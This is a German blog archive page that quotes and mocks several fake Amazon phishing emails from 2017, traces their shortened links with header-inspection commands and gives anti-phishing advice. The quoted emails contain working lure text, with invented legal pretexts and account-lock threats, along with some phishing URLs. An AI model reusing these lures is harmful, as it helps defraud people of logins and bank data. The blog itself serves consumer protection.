Schlagwortarchiv „Amazon“

Bitte verifizieren Sie Ihre Daten

Mittwoch, 1. November 2017

Von: Amazøn.de <de.sec-team@ama-sec-team10.site>

So so, von Amazøn. Das ist bestimmt das dænische Amazon. 😀

Mittwoch, 1. November 2017

Immerhin, das Datum stimmt.

Neue Mitteilung von Ihrem Kudenservice

Und wenn man „Kundenservice“ als eine Bande von Verbrechern versteht, die ihren „Kunden“ mit Trickbetrügereien das Geld aus der Tasche ziehen will, dann stimmt das auch.

Guten Tag,

Mein Name ist auch so richtig gut getroffen.

Nach §5-7 des BDSG sind wir verpflichtet, Ihre Daten auf Integrität zu prüfen und dem Sachverhalt nach zu aktualisieren. Hierzu bitten wir Sie ihgrere Daten in einem kurzen Datenabgleich zu bestätigen.

Daten verifizieren

Aha, falsch eingegebene Daten noch einmal falsch eingeben lassen ist das neue „auf Integrität prüfen“. Der Link geht natürlich nicht zu Amazon oder Amazøn, sondern in die wenig vertrauenerweckende Domain secure (strich) ama (strich) encrypted (punkt) gdn. Natürlich wird ein TLS-Zertifikat verwendet, so dass ein Schlösschen in der Adresszeile erscheint und ein zeitgenössischer Webbrowser nicht wegen des Absendens unverschlüsselter Informationen warnt. So viel nur zu dem Thema, dass ein derartiges Schlangenöl davor schützt, zum Opfer von Kriminellen zu werden. Sicheren Schutz gewährt hingegen ein gut funktionierendes Gehirn.

Da es zu dieser Domain keine Website mehr gibt – ein warmer Dank an den Hoster, der einfach den Stecker gezogen hat! – kann ich keinen Screenshot der Phishing-Seite machen. Dass es sich nicht um Amazon handelt, bemerkt man freilich, wenn man in die Adresszeile seines Webbrowsers schaut.

Mit freunergerdlichen Grüßen
Ihr Kundenservice

Mit was für Grüßen?! 😯

Dies ist eine automatisch versendete Hinweis. Bitte antworten Sie nicht auf diregerese Nachricht, da die EMail Adresse nur zur zum Verschicken von Mails eingerichtet ist.

So so, „diregerese Nachricht“ und „freunergerdlichen Grüße“. Da war der wesentliche Text für das kriminelle Vorhaben fertig geschrieben, es musste nur noch der übliche Formalkram drunter, und schon sind die Gedanken wieder im Bordell und die Konzentration lässt nach…

Validierung notwendig

Donnerstag, 22. Juni 2017

Von: „Amazon.de“ <info@amazon.eu>

Wie immer in der Spam ist der Absender gefälscht.

Auch wie man Grafiken in einer Spam verwendet, um beim Opfer einen falschen Eindruck zu erwecken, hat der Absender durchschaut.

Datum: 21.06.2017

Damit auch etwas Wahres in der Spam steht, hat der Spammer das Datum hineingeschrieben. Das ist zwar völlig unnötig und dumm, weil es auch im Mailheader steht, aber es sieht so schön förmlich aus und es ist so einfach. Außerdem macht Amazon es auch.

Guten Tag Tobias Rodde,

In der mir vorliegenden Spam stimmte die namentliche Ansprache nicht. In vielen anderen Fällen wird sie stimmen. Die Spammer haben eine große, zusammengetragene Datenbank aus Zuordnungen von Namen zu E-Mail-Adressen. Wo sie diese Daten herhaben? Aus vielen Quellen.

Es gelten neue Mindestanforderungen für die Sicherheit von Internetzahlungen § 21 II AgNwV Aus diesem Grund sind wir dazu verpflichtet, Ihre Idendität [sic!] in regelmäßigen Abständen zu überprüfen.

Nun, eine Verordnung, die ihre gegenwärtig gültige Fassung am 15. Oktober 2009 erhalten hat und am 31. Oktober 2009 in Kraft getreten ist¹, ist nicht wirklich „neu“. Aber der Spammer vertraut darauf, dass Menschen von einer derartigen Behauptung so eingeschüchtert sind, dass sie einfach vergessen, wozu man Internet-Suchmaschinen benutzen kann. Solche Leute stören sich auch nicht am Wort „Idendität“ neben der kryptischen Abk. für eine für den Online-Handel mit Gütern irrelevante Verordnung.

Achten Sie während der Überprüfung auf die richtige Eingabe Ihrer Daten, sollte das System Abweichungen zu den bereits hinterlegten Daten feststellen wird Ihr Amazon-Konto automatisch aus Datenschutzrechtlichen Gründen gesperrt. Sobald dieser Fall eintritt, ist eine Legitimation Ihrer Daten nur noch über den Postweg möglich.

Oh, der Rechtschreibbeauftragte ist mal kurz pinkeln gegangen.

Bitte nicht vertippen! Offenbar sind inzwischen viele der Menschen, die auf plumpes Phishing reinfallen, nicht mehr dazu imstande, ihre Anschrift, ihre Bankdaten und ihre Kreditkartennummer nebst allen Angaben halbwegs unfallfrei in eine Webseite einzugeben, die so aussieht, als käme sie von Amazon. Und das ist natürlich ärgerlich für den Phisher, wenn er zwar genug naive Opfer gefunden hat, aber dennoch seine Betrugsgeschäfte nicht durchziehen kann.

Da stellt sich nur noch eine Frage: Warum sollte man das tun?

Warum ist das notwendig?

Dieser Schritt ist notwendig, damit wir Sie als rechtmäßigen Inhaber Ihres Amazon-Kontos identifizieren können. Wir möchten dadurch auch verhindern, dass Dritte Zugang zu Ihrem Amazon-Konto erlangen und finanzielle Schäden verursachen.

Richtig, damit sich keine Betrüger des Amazon-Zuganges bemächtigen können. Sagt ein Betrüger in einer Phishing-Spam. Und das Beste an dieser „Identifikation“ als „rechtmäßiger Inhaber“ ist, dass ein behaupteter Betrüger, der sich des Zuganges bemächtigt hat, völlig sicher und zuverlässig als „rechtmäßiger Inhaber“ erkannt würde, weil er ja alle diese Daten einsehen konnte. Dieses vom Spammer behauptete Verfahren ist also noch sinnloser und dümmer als ein Virenschutz durch ein Heiligenbild, das man auf seinem Rechner aufklebt. Denn beim Heiligenbild schließe ich die mögliche Wirkung nicht aus…

Weiter zur Bestätigung

Der Link ist indirekt über den URL-Kürzungsdienst bit (punkt) ly gesetzt. Amazon hätte so einen Umweg über einen Drittanbieter in einer HTML-formatierten E-Mail nicht nötig, denn es gibt keinen Grund, darin einen Link zu kürzen. Außerdem unterhält Amazon einen eigenen Linkkürzungsdienst, der sicherlich auch von Amazon benutzt würde, wenn der Bedarf bestünde.

Spammer haben es aber immer nötig, die Zieladresse ihrer giftigen, betrügerischen Links zu verbergen, denn die Spamfilter lernen relativ schnell, was Phishing-Seiten sind. Und das ist schlecht für einen Spammer, der davon lebt, dass seine Spams auch bei den Opfern ankommen.

Mal schauen, wo die Reise hingeht, wenn jemand auf den Link klickt:

$ location-cascade http://bit.ly/2tNK8Eh
301	http://bit.ly/2tNK8Eh
302	http://f3892.easyurl.net/
Found	http://chundmeinweed.com/radjesh1
$ lynx -mime_header http://chundmeinweed.com/radjesh1 | grep "^Location"
Location: https://amazon.de-kundeninfo-datavalidierung.com/wer/macht/parra/
$ _

Es geht in die Subdomain amazon der etwas unhandlichen Domain de (strich) kundeninfo (strich) datavalidierung (punkt) com, die natürlich nichts mit Amazon zu tun hat und erst vorgestern unter Angabe einer mutmaßlich missbrauchten Identität eines früheren Opfers dieser Phisher aus Schelsig (Hessen) eingerichtet wurde.

Die Phishing-Seite ist – die Spam ist ja inzwischen doch schon ein paar Stündchen alt – zum Glück bereits aus dem Internet entfernt. 😉

Wer einen Eindruck davon bekommen möchte, wie gegenwärtiges Phishing von Amazon-Zugängen (die dann für Betrugsgeschäfte aller Art missbraucht werden) aussieht, kann sich die Screenshots zu meiner Amazon-Phishingmail vom 5. Juni anschauen. Ich bin mir übrigens sehr sicher, dass diese Phishing-Spam von der gleichen Bande stammt und dass die hier verwendete Phishing-Seite genau so ausgesehen hätte, wenn sie noch verfügbar gewesen wäre.

Vielen Danke ihr ,
Ihr Amazon – Team

Hach ja, zum Ende der Spam nimmt die Konzentration des Rechtschreibbeauftragten doch immer sehr ab, weil die Gedanken schon wieder im Bordell sind und das ganze Geld aus Betrugsgeschäften bei Koks und Nutten verprassen…

Diese Phishing-Spam ist ein Zustecksel meines Lesers M.S., der übrigens kein Amazon-Nutzer ist oder werden möchte.

¹Ich habe eine Archivversion verlinkt, um den heutigen Stand zu dokumentieren, falls sich diese Verordnung in nächster Zeit einmal verändern sollte. Die jeweils aktuell gültige Fassung gibt es natürlich beim Bundesministerium für Justiz.

Ihr Nutzerkonto wurde eingeschränkt!

Montag, 5. Juni 2017

Von: Amazon.de <info@htimmermann.de>

Hey, Spammer! Wenn du schon einen Absender fälschst, dann kannst du es doch wenigstens überzeugend machen. So sieht doch jeder mit einem Minimum an Erfahrung noch vor dem eigentlichen Lesen, dass diese Mail in den Müll kann.

Sonntag, 04. Juni 2017
Bestellung: #287-705990652-528517669

Das Datum steht auch im Mailheader und wird dem Empfänger angezeigt (die Spam ist von gestern, 14:24 Uhr), und die wichtigtuerische Nummer ist nichtssagend. In eine E-Mail ein Datum hineinzuschreiben, ist gnadenlos dumm.

Sehr geehrter Kunde,

Wenn ich Kunde bei Amazon wäre – was ich nicht bin – dann wüsste Amazon auch einen Namen von mir und würde mich persönlich ansprechen. Spätestens jetzt ist klar, dass die Mail in den Müll kann.

Ihre Bestellung über 691,98 EUR bei Apple wurde storniert.

Aber ich habe gar nichts bestellt… 😯

Die Prüfung Ihrer Bestellung hat ergeben, dass diese Transaktion möglicherweise nicht von Ihnen authorisiert wurde. Da es zu mehreren Unstimmigkeiten kam, haben wir diese Transaktion storniert und Ihr Amazon Konto vorrübergehend eingeschränkt.

Aha, es war ja auch gar nicht „von mir authorisiert“. Wie macht man das bei Amazon? Dass die mit digitalen Signaturen arbeiten, kann ich mir eher weniger vorstellen (obwohl es wünschenswert wäre), also kann es sich nur um Bullshit handeln – oder um die blühende Fantasie eines spammenden Idioten bei der Formulierung seiner Strunztexte. Der Idiot macht dann auch gleich weiter und faselt nebulös von „mehreren Unstimmigkeiten“, ohne auch nur eine Einzelheit anzudeuten. Und wegen diesem fluffigen Wölkchen aus schwafelhaften Behauptungen in einer Spam ist mein „Amazon Konto“ mit echtem Deppen Leer Zeichen jetzt erst einmal gesperrt. Und wenn ich das ändern will, erfordert das…

Weitere Details zu ihrer Bestellung, sowie weitere erforderliche Schritte, um die Einschränkung Ihres Kontos aufzuheben, finden Sie unten stehend.

…dass ich etwas tun muss. Wie immer beim Phishing.

Hui, „unten stehend“ – solche bürokratiepapiernen Ausdrucksweisen sind auch nicht gerade Hirn benutzend. Dieser unpersönlich-autoritäre Stil zieht sich noch weiter durch die Spam. Ich hoffe mal für Amazon, dass man dort bessere Formulierungen in der Ansprache der Kunden verwendet.

Wichtiger Tipp gegen Phishing: Wenn man eine solche E-Mail bekommt und sich nicht sofort völlig sicher ist, dass es sich um eine Spam handelt: Niemals in die E-Mail klicken. (Das ist übrigens eine gute generelle Regel für jede nicht digital signierte oder explizit vorher verabredete E-Mail.) Einfach die entsprechende Website (hier ist es Amazon, es sind aber auch gern Banken, eBay und alles, wo Geld umgesetzt oder gekauft wird¹) wie gewohnt im Browser aufrufen und dann dort anmelden! Dabei wird sofort klar, ob das in der Mail behauptete Problem vorliegt. Wenn sich das in der E-Mail behauptete Problem beim Besuch der Website nämlich nicht in den Weg stellt, hat man einen Phishing-Versuch erfolgreich abgewehrt, und es war überhaupt nicht weiter schwierig. Diese leicht zu erlernende Vorsicht kann – es gibt tatsächlich besser gemachtes Phishing als diese Spam – leicht eine Menge Geld und Ärger ersparen.

Einzelheiten Ihrer Bestellung

Bestellung: #287-705990652-528517669
aufgegeben am 3. Juni 2017

Apple iPhone 7 Smartphone (11,9 cm (4,7 Zoll), 32GB interner Speicher, iOS 10) matt-schwarz

Zustand: Neu
Verkauft von: Apple
Versand durch: Amazon
EUR 684,99

Zwischensumme: EUR 684,99

Verpackung und Versand: EUR 6,99

Endbetrag: EUR 691,98

Gewählte Zahlungsart: Bankeinzug

Hui, der Spammer kann Tabellen in eine HTML-formatierte Spam fummeln. Das kann aber nicht jeder! 😀

Leider war nach dieser anstrengenden und hirnenden HTML-Arbeit die verfügbarbare Sorgfalt des Spammers erschöpft, die Gedanken des Spammers wandten sich dem Nachmittag im Bordell zu und deshalb geht die bis jetzt ziemlich unauffällige Rechtschreibung ein bisschen verloren.

Um Ihr Nutzerkonto weiterwhin [sic!], wie gewohnt, [sic! Kommafehler.] nutzen zu können, ist eine kurze Überprüfung Ihrer Identitätit [sic!] notwendig. Um eine weitere unautohorisierte [sic!] Nutzung zu vermeiden, ist dieser Schritt notwendig [sic! Doppelt gemoppelt.].

Neben der normalen Authorisierung (zum Beispiel durch Benutzername und Passwort) gibt es jetzt auch die Autohorisierung und „Überprüfung der Identitätit“ durch erneute Eingabe von Daten bei einem Laden, der diese Daten doch schon längst hat. Der Link auf dem Klickeknöpfchen ist über den URL-Kürzungsdienst bit (punkt) ly maskiert, aber erfreulicherweise…

$ mime-header "http://bit.ly/2qU5BcQ"
http://bit.ly/2qU5BcQ
  HTTP/1.1 302 Found
  Server: nginx
  Date: Mon, 05 Jun 2017 11:16:12 GMT
  Content-Type: text/html; charset=utf-8
  Content-Length: 211
  Connection: close
  Cache-Control: private, max-age=90
  Location: https://bitly.com/a/warning?hash=2qU5BcQ&url=https%3A%2F%2Fwww.secure-verify-amaz-on-kundensicherheit.com%2Faz_script%2F
$ _

…hat schon jemand den Missbrauch des Dienstes an bit (punkt) ly gemeldet, und deshalb gibt es dort eine deutliche Warnseite statt einer stillen Weiterleitung auf eine Betrugsseite von Phishern:

Danke dafür! 😉

Ohne dieses beherzte Einschreiten von bit (punkt) ly würden die Opfer des Phishings mit einer „liebevoll“ nachgemachten Amazon-Anmeldeseite in der Domain secure (strich) verify (strich) amaz (strich) on (strich) kundensicherheit (punkt) com konfrontiert und erhielten die Möglichkeit, dort ihre Amazon-Anmeldung und ein paar weitere Daten an Verbrecher zu verraten. Das sieht dann so aus:

Preisgabe der Zugangsdaten zur Amazon-Website. Diese sind bereits für einen Betrüger missbrauchbar.

Preisgabe der Meldeanschrift und des Geburtsdatums – dies sind übrigens Daten, die für einen kriminellen Identitätsmissbrauch völlig hinreichend sind, und sie gehen an gewerbsmäßige Betrüger.

Preisgabe der Bankverbindung, zusammen mit einem kinderleicht missbrauchbaren Vollzugriff auf die Kreditkarte.

Wer durch diese drei Schritte gegangen ist, hat ein Problem für die nächsten Jahre, denn mit diesen Daten, mit der Kreditkarte und der Bankverbindung werden alle nur erdenklichen Betrugsgeschäfte gemacht. Ich empfehle unbedingt, Strafanzeige zu erstatten und Kontakt mit der Bank aufzunehmen, um weiteren Schaden abzuwenden.

Sie werden zum Schluss an die Konfliktlösung von Amazon.de weitergeleitet. Wir bitten Sie, insofern Sie diese Bestellung nicht getätigt haben, um weitere Schwierigkeiten zu vermeiden, diesen Schritt durchzuführen.

Oh, jetzt ist das Deutsch der Spam aber ein bisschen verschroben.

Wir hoffen auf Ihr Verständnis und verbleiben. [sic! Unpassender Punkt.]

mit freundlichen Grüßen
Amazon.de

Hoffen könnt ihr auf mein Verständnis, so lange ihr wollt. 😀

So, und jetzt noch ein länglich formuliertes Augenpulver, dass der Spammer vermutlich aus einer echten Mail von Amazon rauskopiert hat:

Artikel mit dem Hinweis „Versand durch Amazon“ werden bei einem Drittanbieter gekauft, aber von einem unserer Logistikzentren an Sie verschickt. hierzu zählen auch Artikel, die sie über Amazon.de Warehouse Deals erwerben. Warehouse Deals ist ein Handelsname der Amazon Eu S.à.r.l..

Wir weisen darauf hin, dass Verkäufer möglicherweise zusätzliche Informationen, wie beispielsweise die Ust-Identifikationsnummer anfragen werden, um korrekte Rechnungen ausstellen zu können.

Bitte beachten Sie: Diese E-Mail dient lediglich der Bestätigung des Einganges Ihrer Bestellung und stellt noch keine Annahme Ihres Angebotes auf Abschluss eines Kaufvertrages dar. Ihr Kaufvertrag für einen Artikel kommt zu stande, wenn wir Ihre Bestellung annehmen, indem wir Ihnen eine E-Mail mit der Benachrichtigung zusenden, dass der Artikel an Sie abgeschickt wurde.

Aha! Eine E-Mail, die mich über eine vorübergehende Sperrung meines „Amazon Kontos“ mit dem Deppen Leer Zeichen informiert, dient „lediglich der Bestätigung des Einganges meiner Bestellung“. Gegen Ende ihrer Spam werden die Spammer oft ein wenig nachlässig, weil ihre Gedanken sich schon damit zu beschäftigen beginnen, wo sie das Geld anderer Leute verprassen können.

Dies ist eine automatisch versendete Nachricht. Bitte antworten Sie nicht auf dieses Schreiben, da die Adresse nur zur Versendung von E-Mails eingerichtet ist.

Dies ist eine millionenfach versendete Spam mit gefälschtem Absender.

¹Auch Social-Media-Sites wie Facebook, Twitter und dergleichen sind bei Phishern beliebt, weil sie es zum einen ermöglichen, bei den Kontakten einen Betrug der Marke „Ich sitze hier in Paris fest, wurde beklaut, Geld weg, keine Papiere, kannst du mir kurz über Western Union dreihundert Euro senden, damit ich hier wegkomme, ich zahle sie dir nächste Woche zurück“ einzuleiten und zum anderen ermöglichen, bei Betrugsgeschäften unter falscher Identität aufzutreten – insbesondere, wenn man sich bei anderen Dienstleistern im Web „bequem“ über Twitter, Facebook, Google anmeldet, statt jedesmal ein anderes Passwort zu benutzen.

Neues Authentifizierungsverfahren

Freitag, 19. Mai 2017

Keine Panik! Diese Mail kommt nicht von Amazon. Auch, wenn sie ein Amazon-Logo enthält. Jedes Kind kann eine derartige Grafik von „irgendwo aus dem Web“ mitnehmen und in eine HTML-formatierte Spam verbasteln.

Von: "Amazon.de" <service@amazon.co.uk>

Natürlich ist auch der Absender gefälscht. Wie der Spammer auf die Idee kommt, dass deutsche Kunden vom Support des britischen Amazon angeschrieben werden könnten, weiß ich nicht. Vielleicht macht Amazon das ja wirklich so. Das wäre zwar ein bisschen dumm, weil Amazon dann auf einer Mailadresse Schriftverkehr in vielen verschiedenen Sprachen bekäme, der erst einmal sortiert werden muss, und es wäre auch aus Kundensicht ein wenig verwirrend, aber was weiß ich, wie Amazon seinen Laden organisiert. Wahrscheinlicher ist es allerdings, dass der Spammer hier ein bisschen dumm ist. 😉

Guten Tag Tobias Rodde,

Ich will es mal so sagen: Der Empfänger hieß anders. Völlig anders. Woher der Spammer den Namen genommen hat, bleibt unklar. Ich halte es aber für möglich, dass etliche Empfänger dieser Phishing-Spam mit ihrem richtigen Namen angesprochen werden. Vermutlich ist dem Spammer beim Zusammenführen und Bereinigen seiner Datenbank die Zuordnung von Namen und Mailadressen ein bisschen durcheinandergeraten. Wenn er in den nächsten Tagen einen aufgeweckten Achtjährigen gefunden hat, der es für ihn richtig macht, wird dieses kleine Problemchen sicherlich beseitigt sein.

Aber ob dann der folgende Absatz eine gute Kundenansprache ist?

Diese E-Mail legt eine Reihe von Mindestanforderungen im Bereich der Sicherheit von Internetzahlungen fest. Die EBA-Leitlinien basieren auf den Vorschriften der Richtlinie 2007/64/EG2 („Zahlungsdiensterichtlinie“, „PSD“) über die Informationspflichten für Zahlungsdienste sowie die Pflichten von Zahlungsdienstleistern bei der Erbringung von Zahlungsdiensten . Überdies schreibt Artikel 10 Absatz 4 der PSD vor, dass Zahlungsinstitute über eine solide Unternehmenssteuerung sowie angemessene interne Kontrollmechanismen verfügen müssen.

Aha, und was hat der Kunde damit zu tun? Richtig: Nichts hat der Kunde damit zu tun, denn es betrifft ihn gar nicht. Weshalb steht es dann in der Spam? Richtig: Dieses von irgendwo abgeschriebene bürokratisch-juristische Geschwafel ohne jegliche Bedeutung für einen Kunden einer Internetklitsche hat genau eine Funktion. Es soll den Empfänger beeindrucken und einschüchtern.

Vielleicht freut sich der Amazon-Kunde ja auch darüber, dass sich Amazon (angeblich) im Mai des Jahres 2017 einmal dazu bequemt hat, sich um die Umsetzung einer EU-Richtlinie vom 11. November 2007 zu bemühen. Nein, diese literarisch ungenießbare EU-Juristenprosa braucht niemand zu lesen, aber auf der ersten Seite steht das Datum, und im Gegensatz zum dummen, asozialen und kriminellen Spammer, der hier ebenfalls in einer HTML-formatierten Spam darauf Bezug nimmt, gebe ich gern die Quellen an. Erfreulicherweise gibt es ja inzwischen so ein Internet, und natürlich sind die Veröffentlichungen des Amtsblattes der Europäischen Union auch dort verfügbar. 😉

Für Online-Zahlungen bedeutet dies, dass verpflichtend eine neue, sicherere Methode zur Kundenauthentifizierung eingeführt werden muss. Um die Sicherheit Ihrer Kundendaten zu gewährleisten ist ein Abgleich der hinterlegten Informationen obligatorisch.

Und, was hat der Kunde mit der Implementation einer neuen Methode zur Kundenauthentifizierung zu tun? Richtig: Nichts. Das ist eine Angelegenheit für Programmierer, und im Idealfall merkt der Kunde gar nichts davon.

Aber dem Spammer geht es mit seinem wirren Geschwurbel um etwas anderes, nämlich einen „Abgleich der hinterlegten Informationen“. Denn dem Opfer dieses Phishings soll glauben gemacht werden, dass es aus irgendeinem Grund (wissenschon, dummes EU-Recht) erforderlich sein soll, lauter Daten, die bei Amazon längst bekannt sind, noch einmal auf einer angeblichen Website von Amazon einzugeben. Natürlich gehen diese Daten nicht zu Amazon, sondern direkt zu gewerbsmäßigen Betrügern, was im Falle des Amazon-Logins sowie eventueller Kreditkarten- und Bankdaten sehr unangenehm für das Opfer dieses Phishings werden kann. Denn die Kriminalpolizei schläft nicht und wird schnell vor der Türe stehen, wenn sie dem Gelde zu den Verbrechern folgen will.

Übrigens: Es ist immer und ausnahmslos Unsinn, wenn man längst bekannte Daten wegen irgendeines Bullshits noch einmal eingeben soll. Diesen Unsinn kann man nur in Phishing-Spams lesen.

Bitte achten sie während des Authentifizierungsverfahrens auf mögliche Fehleingaben, sollten wir eine Abweichung zu den bei uns hinterlegten Daten feststellen, ist eine Sperrung Ihres Accounts unvermeidlich.

Das heißt zu gut Deutsch: „Wenn sie so doof sind, alle ihre bei Amazon bekannten Daten noch einmal einzugegeben, weil sie in einer Spam darum gebeten wurden, dann machen sie das wenigstens korrekt, damit unser Betrugsgeschäft reibungsloser läuft“.

Konto bestätigen

Der Link geht auf eine Adresse, die über den URL-Kürzer bit.ly maskiert wurde, um Spamfiltern die Abfrage von Blacklists zu erschweren. Das richtige Amazon würde niemals mit einem solchen „Trick“ arbeiten.

Will ich doch mal nachschauen, wo die Reise hingeht:

$ lynx -mime_header "http://bit.ly/2qxUl9u" | grep "^Location"
Location: http://tinyurl.com/mvezu75
$ _

Aha, es geht von einem URL-Kürzer auf den nächsten URL-Kürzer. Der kürzt dann zwar nicht mehr, aber es soll ja auch die Spamfilterung erschwert und nicht wirklich gekürzt werden. Für solche Umleitungsorgien habe ich mir zum Glück mal ein kleines Skript¹ gemacht, weil sie eine Zeitlang in der Binäre-Optionen-Spam mit großer Penetranz genutzt wurden.

$ location-cascade "http://bit.ly/2qxUl9u"
301	http://bit.ly/2qxUl9u
301	http://tinyurl.com/mvezu75
301	http://judenurl.com/slowdownmonkey83
302	https://de-kundencenter-authentifizierung.com/wer/macht/parra/
Found	/795722/DEJApbOkS90MF8q/5VPeQwAXmqEjx6b/427610010560/oOkLqQjKN3YtwWp/sEN42eBULqQaMJF/
$ _

Oh, es geht in eine tolle, lange Domain, die von DE, Kundencenter und Authentifizierung faselt, aber nichts mit Amazon zu tun hat. Wer hat denn diese Domain registriert? Hui, ein whois offenbart, dass da bei der Registrierung richtige Adressdaten aus Dortmund angegeben wurden, mutmaßlich die Anschrift eines Menschen, dessen Identität von Kriminellen missbraucht wird und der jetzt mehrere Jahre seines Lebens Ärger mit dieser ganzen kriminellen Scheiße haben wird². Deshalb ist man immer sehr sparsam mit seinen persönlichen Daten und gibt diese niemals leichtfertig irgendwo an. Das mag in einer Zeit, in der überall erwartet wird, dass man naiv und unvorsichtig mit Daten umgeht, antiquiert wirken, aber wenn leichtgemachter gewerbsmäßiger Betrug auf Kosten des eigenen Lebens die neue Modernität ist, sollte niemand ein Problem damit haben, ein bisschen antiquiert zu sein. Natürlich kann man dann auch viele Angebote im gegenwärtigen Internet nicht nutzen, die erwarten, dass – oft ohne sachlichen oder technischen Grund – weit in die Privatsphäre hineinragende Daten eingegeben werden. Insbesondere rate ich strikt davon ab, das Geburtsdatum anzugeben. Es ist niemals erforderlich.

So, jetzt noch der Blick auf die Website… oh! Da gibt es jetzt noch eine Weiterleitung:

Screenshot einer Seite bei sedoparking.com, auf die jetzt weitergeleitet wird. -- de-kundencenter-authentifizierung.com -- Sie sind der Domain-Eigentümer und möchten wissen, wieso diese Domain anders als die anderen geparkten Domains aussieht? INFOS HIER...

Da hat wohl schon jemand den Stecker vom Server gezogen. Danke! 😉

Mit freundlichen Grüßen,
Ihr Amazon-Team

„Mein Amazon-Team“ ist das nur in einem sehr skurrilen Sinn des Wortes.

Mit dieser Servicemitteilung informieren wir Sie ?ber wichtige ?nderungen bez?glich Ihres Amazon Kontos.
Copyright © 1998-2017 Amazon.com. Alle Rechte vorbehalten.

Immer wieder das Gleiche bei den dummen Spammern. Sie haben ihre eigentliche Botschaft rübergebracht und sind sogar leidlich fehlerfrei durch die deutsche Sprache gestolpert, und am Ende der Nachricht sind die Gedanken schon wieder im Bordell und die Konzentration lässt nach. Und dann klappt es auf einmal auch mit den Umlauten nicht mehr…

Denn wenn sich der Spammer Mühe geben wollte, könnte er ja auch gleich arbeiten gehen.

Diese Spam ist ein Zustecksel meines Lesers M.S., der etwas vom „dümmsten aller Spammer“ dazu schrieb.

¹Nein, ich gewinne dafür keine Schönheitspreise. Aber es hat mir schon viel Handarbeit erspart, und ich hatte bis jetzt kein Bedürfnis, es besser zu machen.

²Ganz sicher wurden die Daten für etliche „Geschäfte“ benutzt. Warum ich die (leider leicht ermittelbare) Anschrift hier nicht auch noch zitiere, sollte jedem Leser klar sein: Da ist eine arme Seele wahrlich genug gestraft!

Kontoaktualisierung

Montag, 20. Februar 2017

Dies ist eine Spam, die Menschen mit einer halbwegs sicher konfigurierten Mailsoftware gar nicht zu Gesicht bekommen. Sie hat nämlich keinen Text, sondern verwendet eine über imgur (punkt) com eingebettete Grafik.

Natürlich hat diese Spam mit Amazon nichts zu tun. Ich habe sie empfangen. Ich käme niemals auf die Idee, Amazon zu benutzen und habe mich dort nicht registriert. Diese Spam geht an jeden, dessen Mailadresse in den Datenbanken der Spammer steht.

Von: Amazon.de <bwadetumd@pub.kiev.ua>

Diese Spammer hat zwar schon verstanden, dass man eine Absenderadresse fälschen kann, er ist aber intellektuell damit überfordert, den Absender so zu fälschen, dass das Ergebnis seiner „Mühe“ auch jemanden beeindrucken könnte.

Wie schon gesagt: Es ist ein in einer HTML-formatierten Mail extern verlinktes Bild mit Text und nicht das, wonach es aussehen soll. Der ätzrot überlagerte Text „Spam“ ist natürlich von mir, denn ich möchte kein Bildhoster für Spammer werden und finde es schlimm genug, dass imgur (punkt) com den Kriminellen zurzeit sehr dienstbar ist. Das gesamte Bild ist verlinkt. Egal, wohin man klickt, man landet auf einer Website in der obskuren Domain sicherheit (strich) d3qVeMhk (punkt) top, die ganz sicher nicht von Amazon betrieben wird, denn Amazon hat eine eigene Domain für seine Website. Die Daten, die man dort eingibt, gehen nicht an Amazon, sondern an Kriminelle. Was diese Halunken mit den Bankdaten anfangen werden, kann sich hoffentlich jeder vorstellen – und wer es sich wirklich nicht vorstellen kann, frage einfach einmal bei der Polizei oder bei seiner Bank. Einmal ganz davon abgesehen, dass es nach nur ganz kurzem Nachdenken sehr schwer einsehbar ist, warum man Amazon gegenüber Daten nochmals angeben sollte, die bei Amazon längst bekannt sind und welchen Effekt das für „die Sicherheit“ bei Amazon haben sollte. Man muss nicht lange darüber nachdenken, um zu bemerken, dass die Vorwände aus typischen Phishing-Mails unsinnig sind.

Lobenswerterweise hat Amazon selbst auf seiner Website klare Worte dazu geschrieben:

Amazon E-Mails und SMS-Benachrichtigungen […] fragen Sie niemals nach persönlichen Informationen oder bitten um Datenverifizierung über einen Link in der E-Mail oder SMS.
Alle benötigten Daten müssen IMMER über die Amazon.de Website eingegeben werden. Nachrichten von Amazon enthalten daher nur Anleitungen, wie Sie Ihre Informationen auf der Amazon.de Website selbst verwalten können

Ich lege Amazon nahe, seine eigenen E-Mails auch digital zu signieren und seine Kunden darüber zu informieren, um den Phishing-Sumpf auf lange Sicht auszutrocknen.

Lachen und löschen – das ist die angemessene Haltung bei derartig plumpen Überrumpelungsversuchen. Und wenn man sich einmal nicht sicher ist: Niemals in die Mail klicken, immer die Website über ein Lesezeichen im Browser aufrufen! Wenn man sich dann anmeldet und alles wie gewohnt funktioniert, ohne dass man einen Hinweis sieht, hat man mit dieser ganz einfachen Vorsichtsmaßnahme einen Phishing-Versuch abgewehrt und sich selbst bis zu zwei Jahre voller Ärger aller Art mit Polizeien, Staatsanwälten und Untersuchungsrichtern erspart, denn natürlich wird bei gewerbsmäßigem Betrug ermittelt und natürlich ist der Inhaber eines zum Betrug verwendeten Kontos dabei immer die erste Adresse.

Amazon.de Kundenkonto – Information für Mailadresse

Donnerstag, 26. Januar 2017

Vorab: Natürlich kommt diese Mail nicht von Amazon. Es ist Phishing. Deshalb wird diese Mail hier auch erwähnt.

Anstelle von „Mailadresse“ steht im Betreff die Mailadresse des Empfängers – ganz so, als ob es nicht völlig klar wäre, dass eine E-Mail für die Mailadresse bestimmt ist, die als Empfänger eingetragen ist. Das klingt zwar nicht ganz so gut wie ein richtiger Name, kann aber vielleicht das eine oder andere schlichtere Gemüt überzeugen, sagt sich der Spammer Allerdings: Wenn das Telefon klingelte, und ein Unbekannter dort sagte, dass es sich um eine ganz persönliche Information für die angerufene und eigens noch einmal genannte Telefonnummer handele, bekäme wohl noch der Dümmste einen Anfall spontaner Heiterkeit. Genau so absurd ist die nochmalige Angabe der Mailadresse in einer Mail.

Angesichts der Tatsache, dass die Spammer nach diversen „Datenveröffentlichungen“ der letzten Jahre zu sehr vielen Mailadressen auch einen Namen haben, gehe ich davon, dass im Betreff auch der Name stehen kann. Das wirkt dann natürlich nicht so dümmlich und deutlich alarmierender.

Dem modernen Trend der Spammer folgend, hat auch dieser Spammer vollkommen auf Text verzichtet, um mit seinem Phishing durch die Spamfilter zu kommen. Was er seinen Lesern mitzuteilen hat, sagt er stattdessen in einem 43,5 KiB großen PNG-Bild, das einen Text transportiert. Wer ein anderes Betriebssystem als Microsoft Windows verwendet, stößt sich sofort an der für sein System fremdartigen Typografie. Arial sieht einfach nicht besonders gut aus. Das Bild sieht so aus:

